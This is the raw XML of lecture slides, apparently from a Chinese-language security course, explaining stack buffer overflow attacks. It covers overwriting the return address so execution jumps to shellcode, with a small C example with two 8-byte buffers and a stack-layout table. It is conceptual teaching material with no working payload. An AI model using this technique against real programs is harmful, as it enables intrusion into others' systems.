            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>通过缓冲区溢出修改栈中的返回地址</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>当函数调用返回，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>EIP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>获得被修改后的返回地址，并执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>挑战</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>将修改后的返回地址填到正确的位置</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>挑战</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>2: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>返回地址能正确地指向</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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dirty="0" smtClean="0"/>
              <a:t>利用目标程序的缓冲区溢出漏洞，向缓冲区写超其长度的内容，造成缓冲区溢出</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>目标程序：提供</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>远程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>服务</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>缓冲区：用于交互的局部变量、数组等在堆栈中分配的内存空间</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>通常没有边界检测的数组，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>（）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>破坏程序的堆栈</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>使程序转而执行其它指令</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="290818" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>温故而知新</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>缓冲区溢出攻击</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FEF4E944-C727-464C-85A7-E70A1F27AC09}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:pull/>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107504" y="33372"/>
            <a:ext cx="3672408" cy="4655988"/>
          </a:xfrm>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="accent6"/>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="lt1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent6"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="dk1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="109855" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
              <a:t>void fun(int);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="109855" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
              <a:t>int main(void) {</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="109855" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>	……</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="109855" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
              <a:t>	fun(1);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="109855" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>	……</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="109855" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
              <a:t>	return 0;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="109855" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="109855" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
              <a:t>void  fun(int para) {</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="109855" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
              <a:t>	char buffer_a[8];</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="109855" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
              <a:t>	char buffer_b[8];</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="109855" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>	……</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="109855" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40963" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchorCtr="0" compatLnSpc="1"/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{D9B144A5-BE1C-494E-8B1A-5A9540ACEAF4}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0">
              <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="293174" name="Group 310"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3861370" y="44624"/>
          <a:ext cx="5175125" cy="4637089"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="2586763"/>
                <a:gridCol w="2588362"/>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动作</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　　　　堆栈</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itchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>第一步：</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                          <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>main</a:t>
                      </a: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itchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>压入参数１</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第二步：</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调用</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a:t>
                      </a:r>
                      <a:endPar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系统压入返回到</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地址</a:t>
                      </a:r>
                      <a:endPar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0985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第三步：</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将</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基址指针值压入堆栈，同时将</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EBP</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指向</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ESP</a:t>
                      </a:r>
                      <a:endPar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8907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第四步：</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN"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rPr>
                        <a:t>函数压入它的局部变量</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" normalizeH="0" baseline="0" smtClean="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                        <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                        <a:cs typeface="+mn-cs"/>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93178" name="Group 314"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6444208" y="331961"/>
          <a:ext cx="2592263" cy="548640"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="2592263"/>
              </a:tblGrid>
              <a:tr h="2619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　　　</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="12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93177" name="Group 313"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6444233" y="881236"/>
          <a:ext cx="2592263" cy="822960"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="2592263"/>
              </a:tblGrid>
              <a:tr h="2667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51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67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93176" name="Group 312"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6444233" y="1705149"/>
          <a:ext cx="2592263" cy="1097280"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="2592263"/>
              </a:tblGrid>
              <a:tr h="2682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老的基址指针值</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82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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="293175" name="Group 311"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6444233" y="2803699"/>
          <a:ext cx="2592263" cy="1889760"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="2592263"/>
              </a:tblGrid>
              <a:tr h="2714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Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                          <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>老的基址指针值</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buffer_a</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itchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>buffer_b</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2" name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467544" y="4869160"/>
            <a:ext cx="3256014" cy="64807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a:t>局部变量 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>16 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>字节</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="370790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smtClean="0"/>
              <a:t>ebp4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>字节</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="矩形 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514806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smtClean="0"/>
              <a:t>ret4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>字节</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="矩形 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467545" y="5661248"/>
            <a:ext cx="6136334"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zh-CN" altLang="en-US" b="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>输入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>&gt;16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>字节</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>导致溢出，尾部</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>为跳转的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>地址</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="流程图: 文档 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="6516215" y="4941169"/>
            <a:ext cx="648074" cy="504056"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartDocumen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mtClean="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="组合 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7236296" y="4852515"/>
            <a:ext cx="1685925" cy="520701"/>
            <a:chOff x="7236296" y="4852515"/>
            <a:chExt cx="1685925" cy="520701"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17"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FF">
                    <a:alpha val="67998"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="660066">
                    <a:alpha val="74001"/>
                  </a:srgbClr>
                </a:gs>
              </a:gsLst>
              <a:lin ang="2700000" scaled="1"/>
            </a:gradFill>
            <a:ln w="9525" algn="ctr">
              <a:noFill/>
              <a:miter lim="800000"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="Text Box 33"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7306146" y="4852515"/>
              <a:ext cx="1357312" cy="369888"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr>
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="50000"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1800" b="1">
                  <a:solidFill>
                    <a:srgbClr val="0066CC"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>正常流程</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="0066CC"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="22" name="组合 21"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7206555" y="5644603"/>
            <a:ext cx="1685925" cy="520701"/>
            <a:chOff x="7236296" y="4852515"/>
            <a:chExt cx="1685925" cy="520701"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23"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noFill/>
              <a:miter lim="800000"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="Text Box 33"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7306146" y="4852515"/>
              <a:ext cx="1357312" cy="369888"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr>
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="50000"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1800" b="1" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="0066CC"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>异常流程</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="0066CC"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>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3174"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="293174"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="293174"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
